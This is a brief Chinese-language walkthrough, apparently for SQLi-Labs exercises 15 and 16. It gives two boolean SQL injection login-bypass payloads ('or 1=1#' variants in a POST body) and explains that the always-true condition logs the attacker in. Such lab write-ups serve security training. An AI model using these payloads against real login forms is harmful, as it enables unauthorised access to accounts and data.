Less-15
这个注入使用的是布尔值注入：

uname=admin&passwd=password' or 1=1#&submit=Submit

SQL数据库在查询的时候，因为后面的or 1=1，所以无论前面的查询是否正确，都会返回一个正确的结果，这样就可以Iogged In。

Less-16
同上：

uname=admin&passwd=password") or 1=1#&submit=Submit